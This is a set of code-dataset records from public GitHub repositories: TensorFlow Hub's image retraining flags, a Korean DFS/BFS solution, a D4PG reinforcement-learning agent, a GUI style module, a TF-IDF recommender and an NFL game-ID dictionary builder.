which leads to more\n stable results across runs.\\\n \"\"\"\n )\n parser.add_argument(\n '--validation_batch_size',\n type=int,\n default=100,\n help=\"\"\"\\\n How many images to use in an evaluation batch. This validation set is\n used much more often than the test set, and is an early indicator of how\n accurate the model is during training.\n A value of -1 causes the entire validation set to be used, which leads to\n more stable results across training iterations, but may be slower on large\n training sets.\\\n \"\"\"\n )\n parser.add_argument(\n '--print_misclassified_test_images',\n default=False,\n help=\"\"\"\\\n Whether to print out a list of all misclassified test images.\\\n \"\"\",\n action='store_true'\n )\n parser.add_argument(\n '--bottleneck_dir',\n type=str,\n default='/tmp/bottleneck',\n help='Path to cache bottleneck layer values as files.'\n )\n parser.add_argument(\n '--final_tensor_name',\n type=str,\n default='final_result',\n help=\"\"\"\\\n The name of the output classification layer in the retrained graph.\\\n \"\"\"\n )\n parser.add_argument(\n '--flip_left_right',\n default=False,\n help=\"\"\"\\\n Whether to randomly flip half of the training images horizontally.\\\n \"\"\",\n action='store_true'\n )\n parser.add_argument(\n '--random_crop',\n type=int,\n default=0,\n help=\"\"\"\\\n A percentage determining how much of a margin to randomly crop off the\n training images.\\\n \"\"\"\n )\n parser.add_argument(\n '--random_scale',\n type=int,\n default=0,\n help=\"\"\"\\\n A percentage determining how much to randomly scale up the size of the\n training images by.\\\n \"\"\"\n )\n parser.add_argument(\n '--random_brightness',\n type=int,\n default=0,\n help=\"\"\"\\\n A percentage determining how much to randomly multiply the training image\n input pixels up or down by.\\\n \"\"\"\n )\n parser.add_argument(\n '--tfhub_module',\n type=str,\n default=(\n 'https://tfhub.dev/google/imagenet/inception_v3/feature_vector/3'),\n help=\"\"\"\\\n Which TensorFlow Hub module to use. For more options,\n search https://tfhub.dev for image feature vector modules.\\\n \"\"\")\n parser.add_argument(\n '--saved_model_dir',\n type=str,\n default='',\n help='Where to save the exported graph.')\n parser.add_argument(\n '--logging_verbosity',\n type=str,\n default='INFO',\n choices=['DEBUG', 'INFO', 'WARN', 'ERROR', 'FATAL'],\n help='How much logging output should be produced.')\n parser.add_argument(\n '--checkpoint_path',\n type=str,\n default='/tmp/_retrain_checkpoint',\n help='Where to save checkpoint files.'\n )\n FLAGS, unparsed = parser.parse_known_args()\n tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)\n","repo_name":"tensorflow/hub","sub_path":"examples/image_retraining/retrain.py","file_name":"retrain.py","file_ext":"py","file_size_in_byte":55105,"program_lang":"python","lang":"en","doc_type":"code","stars":3408,"dataset":"github-code","pt":"48"} +{"seq_id":"20111143188","text":"def dfs(c):\r\n\r\n # 방문정보 등록\r\n v[c] = 1\r\n ans_dfs.append(c)\r\n\r\n # 다음 방문지\r\n for i in adj[c]:\r\n if v[i] == 0:\r\n dfs(i)\r\n\r\ndef bfs(s):\r\n # 필요한 q, v[], 변수 생성\r\n q = []\r\n\r\n # Q에 초기데이터 삽입\r\n q.append(s)\r\n ans_bfs.append(s)\r\n v[s] = 1\r\n\r\n while q:\r\n c = q.pop(0)\r\n for n in adj[c]:\r\n if v[n] == 0:\r\n q.append(n)\r\n v[n] = 1\r\n ans_bfs.append(n)\r\n\r\n\r\n# 정점 N과 간선 M의 개수, 시작 정점 번호 V\r\nN,M,V = map( int, input().split() )\r\n# 인접 리스트 생성\r\nadj = [[] for _ in range(N+1) ]\r\n# 인접리스트 채우기\r\nfor _ in range(M):\r\n s, e = map( int, input().split() )\r\n # 양방향\r\n adj[s].append(e)\r\n adj[e].append(s)\r\n\r\n# 오름차순 정렬\r\nfor i in range( 1, N+1 ):\r\n adj[i].sort()\r\n\r\n# dfs 방문정보, 방문기록\r\nv = [0] * ( N + 1)\r\nans_dfs = []\r\ndfs(V)\r\n\r\n# bfd 방��정보, 방문기록\r\nv = [0] * ( N + 1)\r\nans_bfs = []\r\nbfs(V)\r\n\r\nprint( *ans_dfs )\r\nprint( *ans_bfs )\r\n\r\n\r\n","repo_name":"hbkuk/Algorithm","sub_path":"백준/Silver/1260. DFS와 BFS/DFS와 BFS.py","file_name":"DFS와 BFS.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16769305227","text":"import copy\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom mpi4py import MPI\nfrom mpi_utils.mpi_utils import sync_networks, sync_grads\nfrom mpi_utils.normalizer import normalizer\nfrom torch.distributions import Categorical\nfrom l2_projection import _l2_project\n\ndevice = torch.device(\"cpu\")\n\n# Implementation of Twin Delayed Deep Deterministic Policy Gradients (TD3)\n# Paper: https://arxiv.org/abs/1802.09477\n\n\nclass Actor(nn.Module):\n\tdef __init__(self, state_dim, action_dim, max_action):\n\t\tsuper(Actor, self).__init__()\n\n\t\tself.l1 = nn.Linear(state_dim, 256)\n\t\tself.l2 = nn.Linear(256, 256)\n\t\tself.l3 = nn.Linear(256, action_dim)\n\t\t\n\t\tself.max_action = max_action\n\t\t\n\n\tdef forward(self, state):\n\t\ta = F.relu(self.l1(state))\n\t\ta = F.relu(self.l2(a))\n\t\treturn self.max_action * torch.tanh(self.l3(a))\n\n\nclass Critic(nn.Module):\n\tdef __init__(self, state_dim, action_dim,v_min,v_max,num_atoms):\n\t\t\"\"\"\n\t\tArgs:\n\t\t\tnum_states (int): state dimension\n\t\t\tnum_actions (int): action dimension\n\t\t\thidden_size (int): size of the hidden layers\n\t\t\tv_min (float): minimum value for critic\n\t\t\tv_max (float): maximum value for critic\n\t\t\tnum_atoms (int): number of atoms in distribution\n\t\t\tinit_w:\n\t\t\"\"\"\n\t\tsuper(Critic, self).__init__()\n\n\t\t# Q1 architecture\n\t\tself.l1 = nn.Linear(state_dim + action_dim, 256)\n\t\tself.l2 = nn.Linear(256, 256)\n\t\tself.l3 = nn.Linear(256, num_atoms)\n\t\t\n\t\tself.z_atoms = np.linspace(v_min, v_max, num_atoms)\n\n\n\n\tdef forward(self, state, action):\n\t\tsa = torch.cat([state, action], 1)\n\n\t\tq1 = F.relu(self.l1(sa))\n\t\tq1 = F.relu(self.l2(q1))\n\t\tq1 = self.l3(q1)\n\n\t\treturn q1\n\t\n\tdef get_probs(self, state, action):\n\t\tq1 = self.forward(state, action)\n\t\tq1 = torch.softmax(q1, dim=1)\n\t\treturn q1\n\t\n\t\n\n\nclass D4PG(object):\n\tdef __init__(\n\t\tself,\n\t\tstate_dim,\n\t\taction_dim,\n\t\tmax_action,\n\t\tdiscount=0.99,\n\t\ttau=0.005,\n\t\tpolicy_noise=0.2,\n\t\tnoise_clip=0.5,\n\t\tpolicy_freq=2,\n\t\tv_min = 0,\n\t\tv_max = 100,\n\t\tnum_atoms = 51,\n\t\t\n\t):\n\t\tself.adam_lr = 3e-4\n\t\t#distributional learning\n\t\tself.v_min = v_min\n\t\tself.v_max = v_max\n\t\tself.num_atoms = num_atoms\n\t\tself.delta_z = (self.v_max - self.v_min) / (self.num_atoms - 1)\n\t\tself.actor = Actor(state_dim, action_dim, max_action).to(device)\n\t\tsync_networks(self.actor)\n\t\tself.actor_target = copy.deepcopy(self.actor)\n\t\tself.actor_optimizer = torch.optim.Adam(self.actor.parameters(), lr=self.adam_lr)\n\n\t\tself.critic = Critic(state_dim, action_dim, self.v_min, self.v_max, self.num_atoms).to(device)\n\t\tsync_networks(self.critic)\n\t\tself.critic_target = copy.deepcopy(self.critic)\n\t\tself.critic_optimizer = torch.optim.Adam(self.critic.parameters(), lr=self.adam_lr)\n\t\t\n\t\t#the Binary Cross Entropy between the target and the input probabilities\n\t\tself.value_criterion = nn.BCELoss(reduction='none')\n\n\t\tself.max_action = max_action\n\t\tself.discount = discount\n\t\tself.tau = tau\n\t\tself.policy_noise = policy_noise\n\t\tself.noise_clip = noise_clip\n\t\tself.policy_freq = policy_freq\n\n\t\tself.total_it = 0\n\t\t\n\tdef select_action(self, state):\n\t\tstate = torch.FloatTensor(state.reshape(1, -1)).to(device)\n\t\treturn self.actor(state).cpu().data.numpy().flatten()\n\t\n\n\n\tdef train(self, replay_buffer, batch_size=256,T = 1):\n\t\tself.total_it += 1\n\t\t####Get experience\n\t\tstate, action, next_state, reward, not_done,d_gamma = replay_buffer.sample(batch_size)\n\n\t\t\n\t\t#start update\n\t\twith torch.no_grad():\n\t\t\t# Select action according to policy and add clipped noise\n\t\t\tnoise = (\n\t\t\t\ttorch.randn_like(action) * self.policy_noise\n\t\t\t).clamp(-self.noise_clip, self.noise_clip)\n\t\t\t\n\t\t\tnext_action = (\n\t\t\t\tself.actor_target(next_state) + noise\n\t\t\t).clamp(-self.max_action, self.max_action)\n\n\t\t\t# predict Z distribution with target Z network\n\t\t\ttarget_Q = self.critic_target.get_probs(next_state, next_action)\n\t\t\n\t\t\t#projected distribution\n\t\t\ttarget_Z_projected = _l2_project(next_distr_v=target_Q,\n rewards_v=reward,\n dones_mask_t=(1-not_done),\n gamma=self.discount,\n n_atoms=self.num_atoms,\n v_min=self.v_min,\n v_max=self.v_max,\n delta_z=self.delta_z)\n\t\t\t#trans to tensor\n\t\t\ttarget_Z_projected = torch.from_numpy(target_Z_projected).float().to(device)\n\t\t\t\n\t\t\t\n\t\t# Get current Q estimates\n\t\tcurrent_Q = self.critic.get_probs(state, action)\n\t\t\n\t\t# Compute critic loss\n\t\tcritic_loss = self.value_criterion(current_Q, target_Z_projected).mean(axis=1) \n\t\t\n\t\t# Optimize the critic\n\t\tcritic_loss = critic_loss.mean()\n\t\t\n\t\tself.critic_optimizer.zero_grad()\n\t\tcritic_loss.backward()\n\t\tsync_grads(self.critic)\n\t\tself.critic_optimizer.step()\n\t\t\n\t\t# Delayed policy updates\n\t\tif self.total_it % self.policy_freq == 0:\n\t\t\tactor_loss = self.critic.get_probs(state, self.actor(state))\n\t\t\tactor_loss = actor_loss*torch.from_numpy(self.critic.z_atoms).float().to(device)\n\t\t\tactor_loss = torch.sum(actor_loss,dim=1)\n\t\t\tactor_loss = -actor_loss.mean()\n\t\t\t\n\t\t\t# Optimize the actor \n\t\t\tself.actor_optimizer.zero_grad()\n\t\t\tactor_loss.backward()\n\t\t\tsync_grads(self.actor)\n\t\t\tself.actor_optimizer.step()\n\n\t\t\t# Update the frozen target models\n\t\t\tfor param, target_param in zip(self.critic.parameters(), self.critic_target.parameters()):\n\t\t\t\ttarget_param.data.copy_(self.tau * param.data + (1 - self.tau) * target_param.data)\n\n\t\t\tfor param, target_param in zip(self.actor.parameters(), self.actor_target.parameters()):\n\t\t\t\ttarget_param.data.copy_(self.tau * param.data + (1 - self.tau) * target_param.data)\n\n\t\t\t\n\tdef save(self, filename):\n\t\ttorch.save(self.critic.state_dict(), filename + \"_critic\")\n\t\ttorch.save(self.critic_optimizer.state_dict(), filename + \"_critic_optimizer\")\n\t\t\n\t\ttorch.save(self.actor.state_dict(), filename + \"_actor\")\n\t\ttorch.save(self.actor_optimizer.state_dict(), filename + \"_actor_optimizer\")\n\n\n\tdef load(self, filename):\n\t\tself.critic.load_state_dict(torch.load(filename + \"_critic\"))\n\t\tself.critic_optimizer.load_state_dict(torch.load(filename + \"_critic_optimizer\"))\n\t\tself.critic_target = copy.deepcopy(self.critic)\n\n\t\tself.actor.load_state_dict(torch.load(filename + \"_actor\"))\n\t\tself.actor_optimizer.load_state_dict(torch.load(filename + \"_actor_optimizer\"))\n\t\tself.actor_target = copy.deepcopy(self.actor)\n\t\t\n","repo_name":"JennieSi-Lab-RLOC/Long-N-Step-Surrogate-Stage-Reward-LNSS-NeurIPS23","sub_path":"LNSS_DRL/D4PG.py","file_name":"D4PG.py","file_ext":"py","file_size_in_byte":6352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11472461109","text":"__all__ = [\n \"Borderstyle\",\n \"FlatBorder\",\n \"GradientBorder\",\n \"OldshadowBorder\",\n \"MaterialBorder\",\n \"BORDERSTYLES\",\n \"norm_borderstyle\",\n \"Style\",\n \"DEFAULT_STYLE\",\n]\n\nimport collections\nimport inspect\nfrom abc import ABCMeta, abstractmethod\nfrom typing import (\n Dict,\n Type,\n TYPE_CHECKING,\n Optional,\n Union,\n Any,\n List,\n Set,\n overload,\n Callable,\n NamedTuple,\n)\n\nfrom .. import util\nfrom ..util.types import *\n\nif TYPE_CHECKING:\n from . import widgets\n\n\nclass _BorderstyleMetaclass(ABCMeta):\n def __new__(mcls, clsname, bases, attrs, name: Optional[str] = None, **kwargs):\n # if name is None:\n # raise TypeError(\n # \"Border styles require a 'name' keyword argument in the class definition\"\n # )\n mcls.name = name\n\n # attrs[\"__eq__\"] = mcls.__eq__\n # attrs[\"name\"] = name\n return super(_BorderstyleMetaclass, mcls).__new__(\n mcls, clsname, bases, attrs, **kwargs\n )\n\n def __eq__(self, other):\n if self.name is not None:\n return other == self.name or self is other\n else:\n return self is other\n\n def __hash__(self):\n return hash((self.name, self.__name__))\n\n\nclass Borderstyle(object, metaclass=_BorderstyleMetaclass):\n \"\"\"\n Base class for all border styles.\n\n Each border style class serves a single style, although some parameters may be adjustable.\n\n Currently, border style classes are not instantiated per widget, but rather rely on\n class methods. This reduces memory overhead but may be changed in the future.\n\n For backwards compatibility, border style classes themselves compare equal with their\n old-style string equivalents. This is accomplished with a metaclass and not necessary\n to emulate for new styles and may be removed in a future version.\n \"\"\"\n\n @classmethod\n @abstractmethod\n def get_colormap(\n cls,\n widget: \"widgets.BasicWidget\",\n bg: ColorRGB,\n o: ColorRGB,\n i: ColorRGB,\n s: ColorRGB,\n h: ColorRGB,\n state: Optional[str] = None,\n ):\n \"\"\"\n Gets the color map for a button-style widget.\n\n TODO: document return format\n\n :param widget: Widget that the color map belongs to\n :type widget: BasicWidget\n :param bg: Background color this widget is placed on\n :type bg: ColorRGB\n :param o: Outer color, usually same as the background\n :type o: ColorRGB\n :param i: Inner color, usually lighter than the background\n :type i: ColorRGB\n :param s: Shadow color, usually quite a bit darker than the background\n :type s: ColorRGB\n :param h: Highlight color, usually quite a bit lighter than the background\n :type h: ColorRGB\n :param state: Optional widget state override\n :type state: str\n :return:\n :rtype:\n \"\"\"\n pass\n\n\nclass FlatBorder(Borderstyle, name=\"flat\"):\n @classmethod\n def get_colormap(\n cls,\n widget: \"widgets.BasicWidget\",\n bg: ColorRGB,\n o: ColorRGB,\n i: ColorRGB,\n s: ColorRGB,\n h: ColorRGB,\n state: Optional[str] = None,\n ):\n cb1 = i + i + i + i\n cb2 = i + i + i + i\n cb3 = i + i + i + i\n cb4 = i + i + i + i\n cc = i + i + i + i\n\n return cb1, cb2, cb3, cb4, cc\n\n\nclass GradientBorder(Borderstyle, name=\"gradient\"):\n @classmethod\n def get_colormap(\n cls,\n widget: \"widgets.BasicWidget\",\n bg: ColorRGB,\n o: ColorRGB,\n i: ColorRGB,\n s: ColorRGB,\n h: ColorRGB,\n state: Optional[str] = None,\n ):\n state = widget.getState() if state is None else state\n\n if state == \"pressed\":\n i = s\n elif state == \"hover\":\n i = [min(i[0] + 6, 255), min(i[1] + 6, 255), min(i[2] + 6, 255)]\n cb1 = i + i + o + o\n cb2 = i + o + o + i\n cb3 = o + o + i + i\n cb4 = o + i + i + o\n cc = i + i + i + i\n\n return cb1, cb2, cb3, cb4, cc\n\n\nclass OldshadowBorder(Borderstyle, name=\"oldshadow\"):\n @classmethod\n def get_colormap(\n cls,\n widget: \"widgets.BasicWidget\",\n bg: ColorRGB,\n o: ColorRGB,\n i: ColorRGB,\n s: ColorRGB,\n h: ColorRGB,\n state: Optional[str] = None,\n ):\n state = widget.getState() if state is None else state\n\n if state == \"pressed\":\n i = s\n s, h = h, s\n elif state == \"hover\":\n i = [min(i[0] + 6, 255), min(i[1] + 6, 255), min(i[2] + 6, 255)]\n s = [min(s[0] + 6, 255), min(s[1] + 6, 255), min(s[2] + 6, 255)]\n cb1 = h + h + h + h\n cb2 = s + s + s + s\n cb3 = s + s + s + s\n cb4 = h + h + h + h\n cc = i + i + i + i\n\n return cb1, cb2, cb3, cb4, cc\n\n\nclass MaterialBorder(Borderstyle, name=\"material\"):\n @classmethod\n def get_colormap(\n cls,\n widget: \"widgets.BasicWidget\",\n bg: ColorRGB,\n o: ColorRGB,\n i: ColorRGB,\n s: ColorRGB,\n h: ColorRGB,\n state: Optional[str] = None,\n ):\n state = widget.getState() if state is None else state\n\n if state == \"pressed\":\n i = [max(bg[0] - 20, 0), max(bg[1] - 20, 0), max(bg[2] - 20, 0)]\n elif state == \"hover\":\n i = [max(bg[0] - 10, 0), max(bg[1] - 10, 0), max(bg[2] - 10, 0)]\n cb1 = s + s + o + o\n cb2 = s + o + o + s\n cb3 = o + o + s + s\n cb4 = o + s + s + o\n cc = i + i + i + i\n\n return cb1, cb2, cb3, cb4, cc\n\n\nBORDERSTYLES: Dict[str, Type[Borderstyle]] = {\n \"flat\": FlatBorder,\n \"gradient\": GradientBorder,\n \"oldshadow\": OldshadowBorder,\n \"material\": MaterialBorder,\n}\n\"\"\"\nMap of border style names to classes that implement them.\n\nSee the documentation of each class for descriptions.\n\"\"\"\n\n\ndef norm_borderstyle(borderstyle: Union[str, Type[Borderstyle]]) -> Type[Borderstyle]:\n \"\"\"\n Normalizes border styles to :py:class:`Borderstyle` subclasses.\n\n :param borderstyle: Value to normalize\n :type borderstyle: Either str or Borderstyle subclass\n :return: Normalized value\n :rtype: Borderstyle subclass\n :raises TypeError: if an unexpected value was given\n \"\"\"\n if isinstance(borderstyle, str):\n if borderstyle not in BORDERSTYLES:\n raise ValueError(f\"Unknown border style {borderstyle}\")\n return BORDERSTYLES[borderstyle]\n elif issubclass(borderstyle, Borderstyle):\n return borderstyle\n else:\n raise TypeError(\"Invalid border style!\")\n\n\nclass StyleWatcher(NamedTuple):\n selector: str\n callback: Union[Callable[[StyleValue], Any], Callable[[], Any]]\n\n\nclass Style(object):\n \"\"\"\n Core of the hierarchical style system.\n\n This class allows for easily inheriting styles from a parent (e.g. submenu or menu)\n while allowing dynamic overwriting at any level in the hierarchy. For example, a\n specific submenu could have a different font that would then be automatically applied\n to all widgets within it, unless the font was overridden for the widget locally.\n\n When reading a style attribute, this class first checks if it has a local override for\n that attribute. If so, it will be returned. If the attribute wasn't overridden locally,\n the parent is queried and its result returned. The root of this hierarchy is the\n :py:attr:`~peng3d.peng.Peng.style` attribute of the :py:class:`~peng3d.peng.Peng()`\n singleton, which uses the styles defined in :py:data:`DEFAULT_STYLE` as a default.\n If a style attribute is not found anywhere, a :py:exc:`KeyError` will be raised.\n\n When writing a style attribute, a local override is created. This causes all subsequent\n accesses to the style attribute within this instance and all children (e.g. widgets\n within a submenu) to read back the new value. Deleting the style attribute will reset\n this override and thus reset the read value back to the parent value.\n\n Note that changes in an attribute usually require a redraw of the affected widgets.\n If a redraw is not performed, weird graphical glitches may happen.\n\n This class is very flexible and allows several different modes of access.\n\n First, it is possible to use it like a dict, e.g. ``style[\"font\"]``\\\\ . It is possible\n to read, write and delete using this method. All styles are accessible in this manner\n and arbitrary strings are allowed as keys, though it is recommended to stick to valid\n Python identifiers.\n\n For convenience, it is also possible to access style attributes as literal attributes\n of a :py:class:`Style` instance, e.g. ``style.font``\\\\ . Note that this only allows\n accesses to style attributes whose name is a valid python identifier and that are\n not in the list of reserved attributes, stored in the class attribute\n :py:attr:`Style.ATTRIBUTES`\\\\ . It is also not possible to access style attributes that\n start with an underscore or are methods of :py:class:`Style` this way. This access\n mode also supports read, write and delete accesses.\n\n Note that unlike the helpers :py:class:`~peng3d.util.default_property` and\n :py:class:`~peng3d.util.default`\\\\ , :py:class:`Style` does not reset an override\n if a write with a value of ``None`` is performed.\n \"\"\"\n\n parent: Union[\"Style\", Dict[str, StyleValue]]\n \"\"\"\n Attribute that stores the parent of this style.\n \n May be changed during runtime, though most widgets will require a redraw to fully\n respect changed effective style values.\n \n It is usually not required to write to this attribute, since widgets do not currently\n support being moved between different submenus or even menus.\n \"\"\"\n\n ATTRIBUTES: List[str] = [\n \"parent\",\n \"ATTRIBUTES\",\n ]\n \"\"\"\n Internal list of attributes that are reserved and cannot be used for styles via\n attribute access.\n \n This list may be extended in the future. Note that all attributes that start with an\n underscore are also implicitly reserved.\n \"\"\"\n\n def __init__(\n self,\n parent: Optional[Union[\"Style\", Dict[str, StyleValue]]] = None,\n overrides: Optional[Dict[str, StyleValue]] = None,\n ) -> None:\n self.parent = parent\n\n if isinstance(parent, Style):\n # Register with parent to be notified of changes\n parent._children.add(self)\n\n self._children: Set[\"Style\"] = set()\n self._watchers: Set[StyleWatcher] = set()\n\n self._overrides: Dict[str, StyleValue] = util.default(overrides, {})\n\n def __getitem__(self, item: str) -> StyleValue:\n if item in self._overrides:\n return self._overrides[item]\n\n return self.parent[item]\n\n def __setitem__(self, key: str, value: StyleValue):\n oldval = self.get(key)\n contained = key in self\n self._overrides[key] = value\n\n if not contained or oldval != value:\n self._trigger_watchers(key, oldval)\n\n def __delitem__(self, key: str) -> None:\n # Only remove if overridden, reduces user code complexity\n if key in self._overrides:\n oldval = self._overrides[key]\n del self._overrides[key]\n\n if oldval != self[key]:\n self._trigger_watchers(key, oldval)\n\n def __contains__(self, item: str) -> bool:\n return item in self._overrides or item in self.parent\n\n def __getattr__(self, item: str) -> StyleValue:\n return self[item]\n\n def __setattr__(self, key: str, value) -> None:\n if (\n key[0] == \"_\" or key in self.ATTRIBUTES\n ): # We use key[0] == \"_\" because it much faster (over 3x)\n super().__setattr__(key, value)\n else:\n self[key] = value\n\n def update(\n self, _overrides: Optional[Dict[str, StyleValue]] = None, **kwargs\n ) -> None:\n \"\"\"\n Updates several style attributes at the same time.\n\n Note that this method only supports creating and modifying overrides. Keys not\n present in the given data will be kept as is.\n\n This method supports both passing in a dictionary and passing in keyword attributes.\n Note that in the case of a style attribute being present in both the dictionary\n and a keyword argument, the keyword argument takes precedence.\n\n :param _overrides: Optional dictionary to add/modify overrides from\n :type _overrides: Optional[Dict[str, StyleValue]]\n :param kwargs: Optional keyword arguments to add/modify overrides from\n :type kwargs: StyleValue\n :return: None\n :rtype: None\n \"\"\"\n if _overrides is not None:\n # self._overrides.update(_overrides)\n for key, val in _overrides.items():\n if key not in kwargs: # To prevent double triggers\n oldval = self._overrides[key]\n self._overrides[key] = val\n if oldval != val:\n self._trigger_watchers(key, oldval)\n\n # self._overrides.update(kwargs)\n for key, val in kwargs.items():\n oldval = self._overrides[key]\n self._overrides[key] = val\n if oldval != val:\n self._trigger_watchers(key, oldval)\n\n def is_overridden(self, key: str) -> bool:\n \"\"\"\n Checks whether a given key is currently being overridden.\n\n If this returns true, any change in parent styles will not affect the value\n of the given style attribute.\n\n :param key: Key to check\n :type key: str\n :return: whether key is currently overridden\n :rtype: bool\n \"\"\"\n return key in self._overrides\n\n def override_if_not_none(self, key: str, value: Optional[StyleValue]) -> None:\n \"\"\"\n Overrides the given key if the provided value is not ``None``\\\\ .\n\n This helper allows for easy style overriding via keyword arguments. Simply create\n a keyword argument in the constructor of an object that uses styles and set the\n default of that keyword argument to ``None``\\\\ . In the constructor, you can then\n call this function like so::\n\n self.style.override_if_not_none(\"font\", font)\n\n Note that this method is unsuitable for style attributes that may actually want\n to have a value of ``None``\\\\ .\n\n :param key: Key to override\n :type key: str\n :param value: value used to override if it is not ``None``\n :type value: Optional[StyleValue]\n :return: None\n :rtype: None\n \"\"\"\n if value is not None:\n self[key] = value\n\n def get(\n self, key: str, default: Optional[StyleValue] = None\n ) -> Optional[StyleValue]:\n \"\"\"\n Returns the effective value of the given key or the given default if it couldn't\n be found.\n \"\"\"\n if key in self._overrides:\n return self._overrides[key]\n return self.parent.get(key, default)\n\n @overload\n def add_watcher(self, watcher: StyleWatcher) -> None:\n pass\n\n @overload\n def add_watcher(\n self,\n selector: str,\n callback: Union[Callable[[StyleValue], Any], Callable[[], Any]],\n ) -> None:\n pass\n\n def add_watcher(self, watch_sel, callback=None):\n \"\"\"\n Adds a watcher for specific changes in local styles.\n\n Watchers can be used to automatically update widgets or other visual elements\n whenever the effective value of a style attribute changes. This includes scenarios\n where the (not locally overridden) style attribute of the parent changes, causing\n a change in the effective local value.\n\n The watcher system tries its best to remove unnecessary triggers and double-triggers,\n but they may still occur under some circumstances. Thus, it is recommended to\n only use (semi-)idempotent functions as callbacks. A popular example for a suitable\n callback would be the `redraw()` method of widgets, since it will only queue\n the actual redraw and thus prevents extraneous redraws.\n\n This method accepts either an instance of :py:class:`StyleWatcher` or a selector\n string followed by a callback function.\n\n Selectors are strings that describe what changes to listen to. Currently, selectors\n are quite rudimentary, but it is planned to add a more sophisticated system later.\n\n The special ``*`` selector matches all changes and will thus be triggered on any\n change of any local attribute.\n\n Alternatively, all other strings will trigger on the change of a style attribute\n with their exact name.\n\n Callback functions can either take no arguments or the old value of the style\n attribute as a single argument.\n \"\"\"\n if isinstance(watch_sel, StyleWatcher):\n sw = watch_sel\n elif isinstance(watch_sel, str) and callback is not None:\n sw = StyleWatcher(watch_sel, callback)\n else:\n raise TypeError(\"Invalid argument combination to add_watcher()\")\n\n sig = inspect.signature(sw.callback)\n if len(sig.parameters) > 1:\n raise TypeError(\n f\"Callback function must have exactly zero or one parameters, not {len(sig.parameters)}!\"\n )\n # Does not cover the case of a single keyword-only argument, which would pass the\n # check, but cause an error at callback-time. Such functions are relatively unusual\n # and thus not checked for\n\n self._watchers.add(sw)\n\n def _trigger_watchers(\n self, key: str, oldval: StyleValue, from_parent: Optional[bool] = False\n ):\n if from_parent and (oldval == self.get(key) or key not in self):\n # Skip if parent change is irrelevant for us\n # Could be either due to a local override or override in some intermediary\n return\n\n for selector, callback in self._watchers:\n match = (selector == key) or (selector == \"*\")\n\n # TODO: extend selector features\n\n if match:\n sig = inspect.signature(callback)\n if len(sig.parameters) == 1:\n callback(oldval)\n elif len(sig.parameters) == 0:\n callback()\n else:\n # Should have been caught earlier already, but just in case\n raise TypeError(\"Invalid callback\")\n\n for child in self._children:\n child._trigger_watchers(key, oldval, from_parent=True)\n\n\nDEFAULT_STYLE: Dict[str, StyleValue] = {\n \"font\": \"Arial\",\n \"font_size\": 16,\n \"font_color\": (62, 67, 73, 255),\n \"border\": (4, 4),\n \"borderstyle\": FlatBorder,\n}\n\"\"\"\nDefault styles for all parts of peng3d.\n\nThese styles represent a sensible default for common use cases.\n\nFor application-wide changes, it is recommended to override the styles in question using\nthe :py:attr:`peng3d.peng.Peng.style` attribute.\n\"\"\"\n","repo_name":"not-na/peng3d","sub_path":"peng3d/gui/style.py","file_name":"style.py","file_ext":"py","file_size_in_byte":19197,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"48"} +{"seq_id":"6734972995","text":"from sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport pandas as pd\nimport pickle\nimport random\n\nclass Tf_cs():\n def __init__(self): # Defining All the List used in Program\n self.l1=[] \n self.l2=[]\n self.l3=[]\n self.l4=[]\n self.l5=[]\n \n def gen(self,no): # Generating 3 Random Articles for each User\n for i in range(no): # List L4 contains all random articles for No. users\n for j in range(3):\n x=random.randint(0,2004)\n self.l4.append(x) # 0 indexing\n \n def input(self,x): # Appending the new article(user attribute) in original Articles\n d=pickle.load(open(\"Document.p\",\"rb\")) # Article X Article \n sen=''\n for i in range(3*x,3*x+3):\n sen+=d[self.l4[i]]+' '\n d.append(sen)\n return d # ALl articles + User's attribute(at last)\n \n def tf_idf(self,doc): #Calculate Tfidf\n vectorizer = TfidfVectorizer()\n tfidf_matrix=vectorizer.fit_transform(doc)\n pickle.dump(tfidf_matrix,open(\"Tfidf2.p\",\"wb\")) \n \n def cs(self,x,y): #Calculate Cosine Similarity\n tfidf_matrix=pickle.load(open(\"Tfidf2.p\",\"rb\"))\n cs_matrix=cosine_similarity(tfidf_matrix[x], tfidf_matrix) # x is the last article id Doc(User attribute)\n ls=cs_matrix[0].tolist() # Converting Sparse Matrix into List\n z=cs_matrix[0].tolist()\n ls.sort(reverse=True) # ls contains Cosine Similarities in Decreasing Order\n for j in range(1,4):\n self.l1.append(y+1) # y is User No\n a=z.index(ls[j]) # Artile No of Nth Similar Article\n self.l2.append(a+1) # O->1 Indexing\n self.l3.append(ls[j]) # Cosine Similarity of Nth Similar Article\n self.l5.append(self.l4[3*y+j-1]+1) # Article present in User Attribute\n \n def ans(self):\n df=pd.DataFrame({'Users':self.l1,'Articles':self.l5,'Similar Articles':self.l2,'Cosine Similarity':self.l3},\n columns=['Users','Articles','Similar Articles','Cosine Similarity'])\n \n return df","repo_name":"ishpreet-singh/recommendation_system","sub_path":"Content Based RS/User-Article Similarity/Tfidf_cs2.py","file_name":"Tfidf_cs2.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"37549364233","text":"### Since NFL Deprecated their results feed, results\n### will be imported using web scraping for now.\n\n### That means individual GameID primary keys are missing from source data.\n### This script will, once per season,\n### create a dictionary containing weekly GameIDs by Home Team.\n\n### That dictionary will be referenced by the results scraper to match results\n### to GameIDs, so they are ready for importing.\n\nimport json\n\nseason = \"2020\"\njsonfile = \"matchesimport_\"+season+\".json\"\n\nwith open(jsonfile) as jsonmatches:\n matchlist = json.load(jsonmatches)\n\nfilename = \"gameid_dict\" + str(season) + \".py\"\npath = './dictionaries' \"//\"\nfullpath = path+filename\noutfile = open(fullpath, \"w\")\n\ngames_2020 = {}\n \nfor week in range(1,18):\n dict_index = \"Week_\"+str(week)\n games_2020[dict_index] = {}\n for fixture in matchlist:\n if fixture['fields']['Week'] == week:\n home = fixture['fields']['HomeTeam']\n games_2020[dict_index][home] = fixture['pk']\n\noutfile.write(\"gameid_dict_\"+season+\" = 